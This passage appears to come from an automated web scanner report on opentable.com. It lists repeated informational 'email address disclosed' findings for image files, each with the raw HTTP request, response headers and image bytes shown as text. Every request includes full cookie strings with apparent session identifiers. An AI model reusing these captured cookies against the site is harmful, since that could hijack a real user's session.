GET /img/restProfile/ToolBarBGCenterGray.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3592
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:52 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:56 GMT

.PNG
.
...IHDR................O...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
20.121. http://www.opentable.com/img/restProfile/icons.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restProfile/icons.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restProfile/icons.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 6028
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:52 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:56 GMT

.PNG
.
...IHDR.......x.....
_)....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
20.122. http://www.opentable.com/img/restProfile/offersIcons.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restProfile/offersIcons.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restProfile/offersIcons.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 4922
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:52 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:57 GMT

.PNG
.
...IHDR...0..........:.....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
20.123. http://www.opentable.com/img/restimages/90.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/90.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/90.jpg HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 24216
Content-Type: image/jpeg
Last-Modified: Tue, 25 Oct 2005 21:28:36 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:54 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
20.124. http://www.opentable.com/img/restimages/x4/12796.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/12796.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/12796.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1626
Content-Type: image/jpeg
Last-Modified: Fri, 05 Nov 2010 17:41:49 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:08 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.125. http://www.opentable.com/img/restimages/x4/12817.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/12817.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/12817.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1687
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:19:44 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:07 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.126. http://www.opentable.com/img/restimages/x4/13705.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/13705.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/13705.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1789
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:19:50 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:38 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.127. http://www.opentable.com/img/restimages/x4/18361.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/18361.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/18361.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1835
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:20:18 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:39 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.128. http://www.opentable.com/img/restimages/x4/19294.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/19294.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/19294.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1604
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:20:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:44 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.129. http://www.opentable.com/img/restimages/x4/2051.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/2051.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/2051.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1499
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:20:34 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:35 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.130. http://www.opentable.com/img/restimages/x4/21061.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/21061.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/21061.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1451
Content-Type: image/jpeg
Last-Modified: Tue, 12 Jul 2011 17:12:50 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:33 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.131. http://www.opentable.com/img/restimages/x4/21835.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/21835.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/21835.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1615
Content-Type: image/jpeg
Last-Modified: Fri, 12 Nov 2010 23:51:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:06 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.132. http://www.opentable.com/img/restimages/x4/22711.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/22711.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/22711.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1794
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:20:50 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:39 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.133. http://www.opentable.com/img/restimages/x4/23506.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/23506.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/23506.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1688
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:20:58 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:07 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.134. http://www.opentable.com/img/restimages/x4/23587.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/23587.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/23587.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1629
Content-Type: image/jpeg
Last-Modified: Tue, 27 Sep 2011 16:26:31 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:43 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.135. http://www.opentable.com/img/restimages/x4/2376.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/2376.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/2376.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1712
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:21:04 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:47 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.136. http://www.opentable.com/img/restimages/x4/25267.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/25267.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/25267.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1629
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:21:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:47 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.137. http://www.opentable.com/img/restimages/x4/27049.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/27049.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/27049.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
